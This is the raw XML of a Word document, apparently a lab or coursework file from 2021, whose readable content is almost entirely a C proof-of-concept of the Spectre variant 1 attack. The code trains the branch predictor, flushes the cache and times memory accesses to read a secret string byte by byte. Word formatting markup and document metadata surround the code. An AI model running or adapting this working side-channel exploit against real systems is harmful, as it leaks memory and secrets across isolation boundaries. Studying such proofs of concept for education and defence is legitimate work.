    </w:p>
    <w:p w14:paraId="30CE1025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#include &lt;intrin.h&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E186E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#pragma optimize("gt", on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C2E9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#else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D654A92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#include &lt;x86intrin.h&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EAC7C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#endif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07004B4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#ifndef _MSC_VER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155D9E3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#define sscanf_s sscanf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709EF7D2" w14:textId="710C18D5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#endif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D962EB3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unsigned int array1_size = 16;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A42CD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uint8_t unused1[64];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443167AC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uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366309FA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uint8_t unused2[64];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EE4602" w14:textId="6B8BE639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uint8_t array2[256 * 512];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4500A892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char* secret = "The Magic Words are Squeamish Ossifrage.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454FCDF8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</w:p>
    <w:p w14:paraId="2FE8E45A" w14:textId="08FCF692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uint8_t temp = 0; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D3002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void victim_function(size_t x) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07777201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if (x &lt; array1_size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D4976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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D7F713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temp &amp;= array2[array1[x] * 512];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E917C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E434AE6" w14:textId="7F0F4CA9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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4A3D3" w14:textId="67032780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#define CACHE_HIT_THRESHOLD (80) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9DC046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void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E6297A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static int results[256];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D20476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int tries, i, j, k, mix_i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B020638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unsigned int junk = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B58D00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size_t training_x, x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF202E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register uint64_t time1, time2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B23CC1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volatile uint8_t* addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1B338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for (i = 0; i &lt; 256; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D555E5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results[i] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584CF10E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for (tries = 999; tries &gt; 0; tries--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC88F23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for (i = 0; i &lt; 256; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27FE85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_mm_clflush(&amp;array2[i * 512]); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685BEEC2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training_x = tries % array1_size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E37C64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for (j = 29; j &gt;= 0; j--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727E218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_mm_clflush(&amp;array1_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70197D6B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for (volatile int z = 0; z &lt; 100; z++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED75B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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCAEE3C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x = ((j % 6) - 1) &amp; ~0xFFFF; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022696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x = (x | (x &gt;&gt; 16)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7333A7E7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x = training_x ^ (x &amp; (malicious_x ^ training_x));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBD4E5E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victim_function(x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7432F5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D3AD6E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for (i = 0; i &lt; 256; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1394A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mix_i = ((i * 167) + 13) &amp; 255;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFAE0B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addr = &amp;array2[mix_i * 512];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F48D87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time1 = __rdtscp(&amp;junk); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E629FE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junk = *addr; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E5C6B8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time2 = __rdtscp(&amp;junk) - time1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B056BB1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if (time2 &lt;= CACHE_HIT_THRESHOLD &amp;&amp; mix_i != array1[tries % array1_size])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A013FE3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results[mix_i]++; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B08D70D" w14:textId="4687E904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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EB967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j = k = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BA0A6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for (i = 0; i &lt; 256; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9EE06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if (j &lt; 0 || results[i] &gt;= results[j]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49150440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k = j;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4650E3E4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j = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28437719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} else if (k &lt; 0 || results[i] &gt;= results[k]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CC8A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k = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EBA9C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE2193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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BAC0CB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if (results[j] &gt;= (2 * results[k] + 5) || (results[j] == 2 &amp;&amp; results[k] == 0))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B831505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break; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA4DFD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521EAF69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results[0] ^= junk; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C3A70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value[0] = (uint8_t)j;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679ADF15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score[0] = results[j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D2755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value[1] = (uint8_t)k;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658AC7A3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score[1] = results[k];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE2BB5" w14:textId="218A0253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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F8437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int main(int argc, const char* * argv) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392FF411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const char *secret = argv[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB311F4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printf("Putting '%s' in memory, address %p\n", secret, (void *)(secret));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4BF6B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size_t malicious_x = (size_t)(secret - (char *)array1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF0366C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int score[2], len = strlen(secret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0364C32D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uint8_t value[2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA0453A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string s = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C9E88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for (size_t i = 0; i &lt; sizeof(array2); i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AAA6CA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</w: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 xml:space="preserve">array2[i] = 1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD75FD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ab/>
        <w:t>if (argc == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934463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FILE *fout;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1577C8D7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fout = fopen(argv[2], "w");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F608D70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fprintf(fout, "Reading %d bytes:\n", len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261ED768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while (--len &gt;= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A82D5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fprintf(fout, "Reading at malicious_x = %p... ", (void *)malicious_x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B9D4E2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readMemoryByte(malicious_x++, value, score);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F28C216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fprintf(fout, "%s: ", (score[0] &gt;= 2 * score[1] ? "Success" : "Unclear"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA939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fprintf(fout, "0x%02X='%c' score=%d ", value[0], (value[0] &gt; 31 &amp;&amp; value[0] &lt; 127 ? value[0] : '?'), score[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEDF522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fprintf(fout, "\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1DFF0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4258B1B6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fclose(fout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA65D72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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5BBF73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printf("Reading %d bytes:\n", len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC5ADF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while (--len &gt;= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6EA69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printf("Reading at malicious_x = %p... ", (void *)malicious_x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621BB055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readMemoryByte(malicious_x++, value, score);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B48A630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printf("%s: ", (score[0] &gt;= 2 * score[1] ? "Success" : "Unclear"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C5C34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printf("0x%02X='%c' score=%d ", value[0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1409E56D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       (value[0] &gt; 31 &amp;&amp; value[0] &lt; 127 ? value[0] : '?'), score[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3325B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    printf("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279FA9E6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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3345920E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F00F117" w14:textId="77777777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 xml:space="preserve">    return (0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562645BE" w14:textId="322DB634" w:rsidR="00A51C39" w:rsidRPr="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C39">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00A51C39">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EA300" w14:textId="77777777" w:rsidR="006E6B7D" w:rsidRPr="006E6B7D" w:rsidRDefault="006E6B7D" w:rsidP="00A5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E6B7D" w:rsidRPr="006E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52F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38CE83CE"/>
    <w:lvl w:ilvl="0" w:tplc="0AD4B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3E7657"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1B0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54117"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8834C702"/>
    <w:lvl w:ilvl="0" w:tplc="05805A6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3C"/>
    <w:rsid w:val="00090FF5"/>
    <w:rsid w:val="001C3370"/>
    <w:rsid w:val="00452D4B"/>
    <w:rsid w:val="005615EC"/>
    <w:rsid w:val="00604D92"/>
    <w:rsid w:val="0063763C"/>
    <w:rsid w:val="006D3069"/>
    <w:rsid w:val="006E6B7D"/>
    <w:rsid w:val="009E0438"/>
    <w:rsid w:val="00A209C3"/>
    <w:rsid w:val="00A51C39"/>
    <w:rsid w:val="00A60013"/>
    <w:rsid w:val="00CD1187"/>
    <w:rsid w:val="00EC2F32"/>
    <w:rsid w:val="00F43D15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4A86"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F2A6F260-77AD-4895-91EA-975A758D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1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18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9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8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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Darling</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-21T14:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-23T21:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>